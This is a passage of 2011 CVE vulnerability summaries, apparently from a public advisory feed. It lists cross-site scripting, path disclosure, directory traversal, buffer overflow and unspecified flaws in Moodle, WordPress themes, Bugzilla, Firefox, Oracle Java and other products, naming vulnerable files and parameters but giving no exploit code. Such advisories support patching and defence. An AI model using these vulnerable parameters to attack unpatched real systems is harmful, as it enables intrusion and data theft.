Multiple cross-site scripting (XSS) vulnerabilities in Dolibarr 3.1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the username parameter in a setup action to admin/company.php, or the PATH_INFO to (2) admin/security_other.php, (3) admin/events.php, or (4) admin/user.php. [CVE-2011-4319] Cross-site scripting (XSS) vulnerability in the i18n translations helper method in Ruby on Rails 3.0.x before 3.0.11 and 3.1.x before 3.1.2, and the rails_xss plugin in Ruby on Rails 2.3.x, allows remote attackers to inject arbitrary web script or HTML via vectors related to a translations string whose name ends with an "html" substring. [CVE-2011-4312] Multiple cross-site scripting (XSS) vulnerabilities in the commenting system in Review Board before 1.5.7 and 1.6.x before 1.6.3 allow remote attackers to inject arbitrary web script or HTML via vectors involving the (1) diff viewer or (2) screenshot component. [CVE-2011-4307] Cross-site scripting (XSS) vulnerability in mod/wiki/lang/en/wiki.php in Moodle 2.0.x before 2.0.5 and 2.1.x before 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the section parameter. [CVE-2011-4306] Cross-site scripting (XSS) vulnerability in course/editsection.html in Moodle 1.9.x before 1.9.14 allows remote authenticated users to inject arbitrary web script or HTML via crafted data. [CVE-2011-4299] Cross-site scripting (XSS) vulnerability in mod/wiki/pagelib.php in Moodle 2.0.x before 2.0.5 and 2.1.x before 2.1.2 allows remote authenticated users to inject arbitrary web script or HTML via a wiki comment. [CVE-2011-4294] The error-message functionality in Moodle 1.9.x before 1.9.13, 2.0.x before 2.0.4, and 2.1.x before 2.1.1 does not ensure that a continuation link refers to an http or https URL for the local Moodle instance, which might allow attackers to trick users into visiting arbitrary web sites via unspecified vectors. [CVE-2011-4290] Multiple cross-site scripting (XSS) vulnerabilities in lib/weblib.php in Moodle 1.9.x before 1.9.12 allow remote attackers to inject arbitrary web script or HTML via vectors related to URL encoding. [CVE-2011-4286] Multiple cross-site scripting (XSS) vulnerabilities in the media-filter implementation in filter/mediaplugin/filter.php in Moodle 1.9.x before 1.9.11 and 2.0.x before 2.0.2 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) Flash Video (aka FLV) files and (2) YouTube videos. [CVE-2011-4282] Multiple cross-site scripting (XSS) vulnerabilities in the course-tags functionality in tag/coursetags_more.php in Moodle 2.0.x before 2.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) sort or (2) show parameter. [CVE-2011-4280] Cross-site scripting (XSS) vulnerability in the Spike PHPCoverage (aka spikephpcoverage) library, as used in Moodle 2.0.x before 2.0.2 and other products, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4278] Cross-site scripting (XSS) vulnerability in the tag autocomplete functionality in Moodle 1.9.x before 1.9.11 and 2.0.x before 2.0.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4277] Cross-site scripting (XSS) vulnerability in CourseForum ProjectForum 7.0.1.3038 allows remote attackers to inject arbitrary web script or HTML via a crafted name of an object within a more object on a wiki page. [CVE-2011-4275] Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1.1.181 and 1.2.0-RC-282 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted company name, (2) a crafted database server name, (3) a crafted CSV file, (4) a crafted copy-and-paste action, (5) the auth_user parameter in a suggest_pwd action to UI.php, (6) the c[menu] parameter to UniversalSearch.php, (7) the description parameter in a SearchFormToAdd_document_list action to UI.php, (8) the category parameter in an errors action to audit.php, or (9) the suggest_pwd parameter to UI.php. [CVE-2011-4274] Cross-site scripting (XSS) vulnerability in the A-Form PC and PC/Mobile before 3.1 plug-ins for Movable Type allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-2676. [CVE-2011-4273] Multiple cross-site scripting (XSS) vulnerabilities in GoAhead Webserver 2.18 allow remote attackers to inject arbitrary web script or HTML via (1) the group parameter to goform/AddGroup, related to addgroup.asp [CVE-2011-4265] Cross-site scripting (XSS) vulnerability in phpWebSite before 1.0.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4264] Cross-site scripting (XSS) vulnerability in Etomite before 1.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4263] Cross-site scripting (XSS) vulnerability in Schneider Electric PowerChute Business Edition before 8.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4232] The web server in Cisco Unified MeetingPlace 6.1 and 8.5 produces different responses for directory queries depending on whether the directory exists, which allows remote attackers to enumerate directory names via a series of queries, aka Bug ID CSCtt94070. [CVE-2011-4172] Multiple cross-site scripting (XSS) vulnerabilities in KENT-WEB WEB FORUM before 5.1 allow remote attackers to inject arbitrary web script or HTML via (1) an e-mail address field or (2) a cookie, a related issue to CVE-2011-3383, CVE-2011-3983, and CVE-2011-3984. [CVE-2011-4171] Cross-site scripting (XSS) vulnerability in content/error.jsp in IBM WebSphere ILOG Rule Team Server 7.1.1 allows remote attackers to inject arbitrary web script or HTML via the project parameter to teamserver/faces/home.jsp. [CVE-2011-4170] Cross-site scripting (XSS) vulnerability in the theme_adium_append_message function in empathy-theme-adium.c in the Adium theme in libempathy-gtk in Empathy 3.2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted alias (aka nickname) in a /me event, a different vulnerability than CVE-2011-3635. [CVE-2011-4156] Cross-site scripting (XSS) vulnerability in HP Network Node Manager i (NNMi) 9.0x and 9.1x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-4155. [CVE-2011-4155] Cross-site scripting (XSS) vulnerability in HP Network Node Manager i (NNMi) 9.0x and 9.1x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-4156. [CVE-2011-4143] EMC RSA enVision 4.0 before SP4 P5 and 4.1 before P3 allows remote attackers to obtain sensitive information about environment variables in the web system via unspecified vectors. [CVE-2011-4142] The Web Search feature in EMC SourceOne Email Management 6.5 before 6.5.2.4033, 6.6 before 6.6.1.2194, and 6.7 before 6.7.2.2033 places cleartext credentials in log files, which allows local users to obtain sensitive information by reading these files. [CVE-2011-4140] The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code. [CVE-2011-4129] (1) services/twitter/twitter-contact-view.c and (2) services/twitter/twitter-item-view.c in libsocialweb before 0.25.20 automatically connect to Twitter when no Twitter account is set, which might allow remote attackers to obtain sensitive information via a man-in-the-middle (MITM) attack. [CVE-2011-4112] The net subsystem in the Linux kernel before 3.1 does not properly restrict use of the IFF_TX_SKB_SHARING flag, which allows local users to cause a denial of service (panic) by leveraging the CAP_NET_ADMIN capability to access /proc/net/pktgen/pgctrl, and then using the pktgen package in conjunction with a bridge device for a VLAN interface. [CVE-2011-4087] The br_parse_ip_options function in net/bridge/br_netfilter.c in the Linux kernel before 2.6.39 does not properly initialize a certain data structure, which allows remote attackers to cause a denial of service by leveraging connectivity to a network interface that uses an Ethernet bridge device. [CVE-2011-4078] include/iniset.php in Roundcube Webmail 0.5.4 and earlier, when PHP 5.3.7 or 5.3.8 is used, allows remote attackers to trigger a GET request for an arbitrary URL, and cause a denial of service (resource consumption and inbox outage), via a Subject header containing only a URL, a related issue to CVE-2011-3379. [CVE-2011-4074] Cross-site scripting (XSS) vulnerability in cmd.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via an _debug command. [CVE-2011-4055] Buffer overflow in the WebClient ActiveX control in Siemens Tecnomatix FactoryLink 6.6.1 (aka 6.6 SP1), 7.5.217 (aka 7.5 SP2), and 8.0.2.54 allows remote attackers to execute arbitrary code via a long string in a parameter associated with the location URL. [CVE-2011-4054] Cross-site scripting (XSS) vulnerability in login.fcc in CA SiteMinder R6 SP6 before CR7 and R12 SP3 before CR8 allows remote attackers to inject arbitrary web script or HTML via the postpreservationdata parameter. [CVE-2011-4052] Stack-based buffer overflow in CEServer.exe in the CEServer component in the Remote Agent module in InduSoft Web Studio 6.1 and 7.0 allows remote attackers to execute arbitrary code via a crafted 0x15 (aka Remove File) operation for a file with a long name. [CVE-2011-4051] CEServer.exe in the CEServer component in the Remote Agent module in InduSoft Web Studio 6.1 and 7.0 does not require authentication, which allows remote attackers to execute arbitrary code via vectors related to creation of a file, loading a DLL, and process control. [CVE-2011-4041] webvrpcs.exe in Advantech/BroadWin WebAccess allows remote attackers to execute arbitrary code or obtain a security-code value via a long string in an RPC request to TCP port 4592. [CVE-2011-4038] Cross-site scripting (XSS) vulnerability in Invensys Wonderware HMI Reports 3.42.835.0304 and earlier, as used in Ocean Data Systems Dream Report before 4.0 and other products, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2011-4035] Cross-site scripting (XSS) vulnerability in Schneider Electric Vijeo Historian 4.30 and earlier, CitectHistorian 4.30 and earlier, and CitectSCADAReports 4.10 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4024] Cross-site scripting (XSS) vulnerability in ocsinventory in OCS Inventory NG 2.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4015] Cisco IOS 15.2S allows remote attackers to cause a denial of service (interface queue wedge) via malformed UDP traffic on port 465, aka Bug ID CSCts48300. [CVE-2011-4014] The TAC Case Attachment tool in Cisco Wireless Control System (WCS) 7.0 allows remote authenticated users to read arbitrary files under webnms/Temp/ via unspecified vectors, aka Bug ID CSCtq86807. [CVE-2011-4004] Buffer overflow in the ATAS32 processing functionality in the Cisco WebEx Recording Format (WRF) player T26 before SP49 EP40 and T27 before SP28 allows remote attackers to execute arbitrary code via a crafted WRF file. [CVE-2011-3999] Cross-site scripting (XSS) vulnerability in the RSS/Atom feed-reader implementation in Iwate Portal Bar allows remote attackers to inject arbitrary web script or HTML via a crafted feed. [CVE-2011-3998] Cross-site scripting (XSS) vulnerability in Apple WebObjects 5.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-3990] Cross-site scripting (XSS) vulnerability in plugin/comment.inc.php in PukiWiki Plus! 1.4.7plus-u2-i18n and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-3986] Cross-site scripting (XSS) vulnerability in Pligg before 1.2.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-3985] Cross-site scripting (XSS) vulnerability in Plume before 1.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-3984] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB FORUM 5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to "web form entries." [CVE-2011-3983] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB FORUM 5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to cookies. [CVE-2011-3981] PHP remote file inclusion vulnerability in actions.php in the Allwebmenus plugin 1.1.3 for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the abspath parameter. [CVE-2011-3979] Cross-site scripting (XSS) vulnerability in ztemp/view_compiled/Theme/theme_admin_setasdefault.php in the theme module in Zikula Application Framework 1.3.0 build 3168, 1.2.7, and probably other versions allows remote attackers to inject arbitrary web script or HTML via the themename parameter in the setasdefault action to index.php. [CVE-2011-3978] Multiple cross-site scripting (XSS) vulnerabilities in LightNEasy.php in LightNEasy 3.2.4 allow remote authenticated users to inject arbitrary web script or HTML via the (1) commentemail, (2) commentmessage, or (3) commentname parameter in a sendcomment action for the news page. [CVE-2011-3975] A certain HTC update for Android 2.3.4 build GRJ22, when the Sense interface is used on the HTC EVO 3D, EVO 4G, ThunderBolt, and unspecified other devices, provides the HtcLoggers.apk application, which allows user-assisted remote attackers to obtain a list of telephone numbers from a log, and other sensitive information, by leveraging the android.permission.INTERNET application permission and establishing TCP sessions to 127.0.0.1 on port 65511 and a second port. [CVE-2011-3889] Heap-based buffer overflow in the Web Audio implementation in Google Chrome before 15.0.874.102 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2011-3877] Cross-site scripting (XSS) vulnerability in the appcache internals page in Google Chrome before 15.0.874.102 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-3865] Cross-site scripting (XSS) vulnerability in the Black-LetterHead theme before 1.6 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php. [CVE-2011-3864] Cross-site scripting (XSS) vulnerability in the The Erudite theme before 2.7.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cpage parameter. [CVE-2011-3863] Cross-site scripting (XSS) vulnerability in the RedLine theme before 1.66 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2011-3862] Cross-site scripting (XSS) vulnerability in the Morning Coffee theme before 3.6 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php. [CVE-2011-3861] Cross-site scripting (XSS) vulnerability in the Web Minimalist 200901 theme before 1.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php. [CVE-2011-3860] Cross-site scripting (XSS) vulnerability in the Cover WP theme before 1.6.6 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2011-3859] Cross-site scripting (XSS) vulnerability in the Trending theme before 0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cpage parameter. [CVE-2011-3858] Cross-site scripting (XSS) vulnerability in the Pixiv Custom theme before 2.1.6 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2011-3857] Cross-site scripting (XSS) vulnerability in the Antisnews theme before 1.10 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2011-3856] Cross-site scripting (XSS) vulnerability in the Elegant Grunge theme before 1.0.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2011-3855] Cross-site scripting (XSS) vulnerability in the F8 Lite theme before 4.2.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2011-3854] Cross-site scripting (XSS) vulnerability in the ZenLite theme before 4.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2011-3853] Cross-site scripting (XSS) vulnerability in the Hybrid theme before 0.10 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cpage parameter. [CVE-2011-3852] Cross-site scripting (XSS) vulnerability in the EvoLve theme before 1.2.6 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2011-3851] Cross-site scripting (XSS) vulnerability in the News theme before 0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cpage parameter. [CVE-2011-3850] Cross-site scripting (XSS) vulnerability in the Atahualpa theme before 3.6.8 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2011-3845] Use-after-free vulnerability in Apple Safari 5.1.2, when a plug-in with a blocking function is installed, allows user-assisted remote attackers to execute arbitrary code via a crafted web page that is accessed during user interaction with the plug-in, leading to improper coordination between an API call and the plug-in unloading functionality, as demonstrated by the Adobe Flash and RealPlayer plug-ins. [CVE-2011-3844] Apple Safari 5.0.5 does not properly implement the setInterval function, which allows remote attackers to spoof the address bar via a crafted web page. [CVE-2011-3841] Cross-site scripting (XSS) vulnerability in uploadify/get_profile_avatar.php in the WP Symposium plugin before 11.12.08 for WordPress allows remote attackers to inject arbitrary web script or HTML via the uid parameter. [CVE-2011-3835] Multiple cross-site scripting (XSS) vulnerabilities in Wuzly 2.0 allow remote attackers to inject arbitrary web script or HTML via the Referer header to (1) admin/login.php and (2) admin/404.php [CVE-2011-3830] Cross-site scripting (XSS) vulnerability in search.php in Support Incident Tracker (aka SiT!) 3.65 allows remote attackers to inject arbitrary web script or HTML via the search_string parameter. [CVE-2011-3828] DVRemoteAx.ax 2.1.0.39 in the DVR Remote ActiveX control allows remote attackers to execute arbitrary code via a crafted DVRobot.dll file in a manifest directory on a web server. [CVE-2011-3817] Website Baker 2.8.1 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by admin/media/parameters.php and certain other files. NOTE: this might overlap CVE-2005-2436. [CVE-2011-3816] WEBinsta mailing list manager 1.3e allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by install/install3.php and certain other files. [CVE-2011-3815] WeBid 1.0.0 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by js/calendar.php and certain other files. [CVE-2011-3814] WebCalendar 1.2.3, and other versions before 1.2.5, allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by ws/user_mod.php and certain other files. [CVE-2011-3810] TinyWebGallery (TWG) 1.8.3 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by i_frames/i_register.php. [CVE-2011-3757] Moodle 2.0.1 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by webservice/xmlrpc/locallib.php and certain other files. [CVE-2011-3737] eyeOS 2.2.0.0 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by apps/rmail/webmail/program/lib/Net/SMTP.php and certain other files. [CVE-2011-3695] 111WebCalendar 1.2.3 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by footer.php and certain other files. [CVE-2011-3689] Cross-site scripting (XSS) vulnerability in Licenses.html in Wibu-Systems CodeMeter WebAdmin 3.30 and 4.30 allows remote attackers to inject arbitrary web script or HTML via the BoxSerial parameter. [CVE-2011-3687] Multiple cross-site scripting (XSS) vulnerabilities in Sonexis ConferenceManager 9.2.11.0 allow remote attackers to inject arbitrary web script or HTML via (1) the txtConferenceID parameter to HostLogin.asp, (2) the txtConferenceID parameter to ParticipantLogin.asp, (3) the acp parameter to ForgotPIN.asp, or the (4) Description, (5) title, or (6) Heading parameter to Error.asp. [CVE-2011-3686] Multiple cross-site scripting (XSS) vulnerabilities in myAddressBook.asp in Sonexis ConferenceManager 9.2.11.0 and 9.3.14.0 allow remote attackers to inject arbitrary web script or HTML via the (1) fname, (2) lname, (3) email_edit, (4) email, (5) email2, (6) email3, (7) sms, (8) sms_id, or (9) work parameter. [CVE-2011-3684] Multiple cross-site scripting (XSS) vulnerabilities in Tembria Server Monitor before 6.0.5 Build 2252 allow remote attackers to inject arbitrary web script or HTML via (1) the siteid parameter to logbook.asp, (2) the siteid parameter to monitor-events.asp, (3) the siteid parameter to reports-config-by-device.asp, (4) the siteid parameter to reports-config-by-monitor.asp, (5) the siteid parameter to reports-monitoring-queue.asp, (6) the action parameter to site-list.asp, the (7) siteid or (8) type parameter to event-history.asp, the (9) siteid or (10) type parameter to admin-history.asp, the (11) siteid or (12) id parameter to dashboard-view.asp, the (13) siteid or (14) dn parameter to device-events.asp, the (15) siteid or (16) submit parameter to device-finder.asp, the (17) siteid or (18) dn parameter to device-monitors.asp, the (19) siteid or (20) type parameter to device-views.asp, the (21) siteid or (22) type parameter to monitor-views.asp, the (23) siteid or (24) sel parameter to reports-list.asp, the (25) siteid, (26) action, or (27) sel parameter to monitor-list.asp, or the (28) siteid, (29) action, or (30) sel parameter to device-list.asp. [CVE-2011-3667] The User.offer_account_by_email WebService method in Bugzilla 2.x and 3.x before 3.4.13, 3.5.x and 3.6.x before 3.6.7, 3.7.x and 4.0.x before 4.0.3, and 4.1.x through 4.1.3, when createemailregexp is not empty, does not properly handle user_can_create_account settings, which allows remote attackers to create user accounts by leveraging a token contained in an e-mail message. [CVE-2011-3664] Mozilla Firefox before 9.0, Thunderbird before 9.0, and SeaMonkey before 2.6 on Mac OS X do not properly handle certain DOM frame deletions by plugins, which allows remote attackers to cause a denial of service (incorrect pointer dereference and application crash) or possibly have unspecified other impact via a crafted web site. [CVE-2011-3663] Mozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and SeaMonkey before 2.6 allow remote attackers to capture keystrokes entered on a web page, even when JavaScript is disabled, by using SVG animation accessKey events within that web page. [CVE-2011-3657] Multiple cross-site scripting (XSS) vulnerabilities in Bugzilla 2.x and 3.x before 3.4.13, 3.5.x and 3.6.x before 3.6.7, 3.7.x and 4.0.x before 4.0.3, and 4.1.x through 4.1.3, when debug mode is used, allow remote attackers to inject arbitrary web script or HTML via vectors involving a (1) tabular report, (2) graphical report, or (3) new chart. [CVE-2011-3655] Mozilla Firefox 4.x through 7.0 and Thunderbird 5.0 through 7.0 perform access control without checking for use of the NoWaiverWrapper wrapper, which allows remote attackers to gain privileges via a crafted web site. [CVE-2011-3653] Mozilla Firefox before 8.0 and Thunderbird before 8.0 on Mac OS X do not properly interact with the GPU memory behavior of a certain driver for Intel integrated GPUs, which allows remote attackers to bypass the Same Origin Policy and read image data via vectors related to WebGL textures. [CVE-2011-3648] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.6.24 and 4.x through 7.0 and Thunderbird before 3.1.6 and 5.0 through 7.0 allows remote attackers to inject arbitrary web script or HTML via crafted text with Shift JIS encoding. [CVE-2011-3647] The JSSubScriptLoader in Mozilla Firefox before 3.6.24 and Thunderbird before 3.1.6 does not properly handle XPCNativeWrappers during calls to the loadSubScript method in an add-on, which makes it easier for remote attackers to gain privileges via a crafted web site that leverages certain unwrapping behavior, a related issue to CVE-2011-3004. [CVE-2011-3636] Cross-site request forgery (CSRF) vulnerability in the management interface in FreeIPA before 2.1.4 allows remote attackers to hijack the authentication of administrators for requests that make configuration changes. [CVE-2011-3635] Cross-site scripting (XSS) vulnerability in the theme_adium_append_message function in empathy-theme-adium.c in the Adium theme in libempathy-gtk in Empathy 3.2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted alias (aka nickname). [CVE-2011-3598] Multiple cross-site scripting (XSS) vulnerabilities in phpPgAdmin before 5.0.3 allow remote attackers to inject arbitrary web script or HTML via (1) a web page title, related to classes/Misc.php [CVE-2011-3580] IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to obtain configuration information via a direct request to the /server URI, which triggers a call to the phpinfo function. [CVE-2011-3579] server/webmail.php in IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to read arbitrary files, and possibly send HTTP requests to intranet servers or cause a denial of service (CPU and memory consumption), via an XML external entity declaration in conjunction with an entity reference. [CVE-2011-3578] Cross-site scripting (XSS) vulnerability in bug_actiongroup_ext_page.php in MantisBT before 1.2.8 allows remote attackers to inject arbitrary web script or HTML via the action parameter, related to bug_actiongroup_page.php, a different vulnerability than CVE-2011-3357. [CVE-2011-3577] IBM WebSphere Commerce 6.x through 6.0.0.11 and 7.x through 7.0.0.3 does not properly implement Activity Token authentication for Web Services, which has unspecified impact and attack vectors. [CVE-2011-3576] Cross-site scripting (XSS) vulnerability in IBM Lotus Domino 8.5.2 allows remote attackers to inject arbitrary web script or HTML via the PanelIcon parameter in an fmpgPanelHeader ReadForm action to WebAdmin.nsf. [CVE-2011-3575] Stack-based buffer overflow in the NSFComputeEvaluateExt function in Nnotes.dll in IBM Lotus Domino 8.5.2 allows remote authenticated users to execute arbitrary code via a long tHPRAgentName parameter in an fmHttpPostRequest OpenForm action to WebAdmin.nsf. [CVE-2011-3569] Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote attackers to affect confidentiality via unknown vectors related to Web Services Security. [CVE-2011-3568] Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web Services Security. [CVE-2011-3566] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.2.4, 10.0.2, 10.3.3, 10.3.4, and 10.3.5 allows remote attackers to affect availability via unknown vectors related to Web Container. [CVE-2011-3560] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and integrity, related to JSSE. [CVE-2011-3558] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to HotSpot. [CVE-2011-3555] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE, and 7 allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity and availability via unknown vectors. [CVE-2011-3554] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2011-3550] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability, related to AWT. [CVE-2011-3549] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Swing. [CVE-2011-3548] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability, related to AWT. [CVE-2011-3547] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Networking. [CVE-2011-3546] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and JavaFX 2.0 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and integrity via unknown vectors related to Deployment. [CVE-2011-3544] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Scripting. [CVE-2011-3531] Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote attackers to affect availability via unknown vectors related to Web Services Security. [CVE-2011-3526] Unspecified vulnerability in the Siebel Core - UIF Server component in Oracle Siebel CRM 8.0.0 and 8.1.1 allows remote authenticated users to affect confidentiality via unknown vectors related to User Interface. [CVE-2011-3523] Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 10.1.3.5.0 and 10.1.3.5.1 allows remote authenticated users to affect integrity, related to WSM Console. [CVE-2011-3521] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE, 7, 6 Update 27 and earlier, and 5.0 Update 31 earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deserialization. [CVE-2011-3518] Unspecified vulnerability in the Siebel Core - UIF Client component in Oracle Siebel CRM 8.0.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to User Interface. [CVE-2011-3516] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 6 Update 27 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. [CVE-2011-3502] The web server in Cogent DataHub 7.1.1.63 and earlier allows remote attackers to obtain the source code of executable files via a request with a trailing (1) space or (2) %2e (encoded dot). [CVE-2011-3500] Directory traversal vulnerability in the web server in Cogent DataHub 7.1.1.63 and earlier allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in an HTTP request. [CVE-2011-3463] WebDAV Sharing in Apple Mac OS X 10.7.x before 10.7.3 does not properly perform authentication, which allows local users to gain privileges by leveraging access to (1) the server or (2) a bound directory. [CVE-2011-3443] Use-after-free vulnerability in WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption and application crash) via vectors related to improper list management for Cascading Style Sheets (CSS) @font-face rules. [CVE-2011-3426] Cross-site scripting (XSS) vulnerability in Safari in Apple iOS before 5 allows remote web servers to inject arbitrary web script or HTML via a file accompanied by a "Content-Disposition: attachment" HTTP header. [CVE-2011-3424] Session fixation vulnerability in the Managed File Transfer server in TIBCO Managed File Transfer Internet Server before 7.1.1 and Managed File Transfer Command Center before 7.1.1, and the server in TIBCO Slingshot before 1.8.1, allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2011-3423] Cross-site scripting (XSS) vulnerability in the Managed File Transfer server in TIBCO Managed File Transfer Internet Server before 7.1.1 and Managed File Transfer Command Center before 7.1.1, and the server in TIBCO Slingshot before 1.8.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-3415] Open redirect vulnerability in the Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted return URL, aka "Insecure Redirect in .NET Form Authentication Vulnerability." [CVE-2011-3404] Microsoft Internet Explorer 6 through 9 does not properly use the Content-Disposition HTTP header to control rendering of the HTTP response body, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Content-Disposition Information Disclosure Vulnerability." [CVE-2011-3402] Unspecified vulnerability in the TrueType font parsing engine in win32k.sys in the kernel-mode drivers in Microsoft 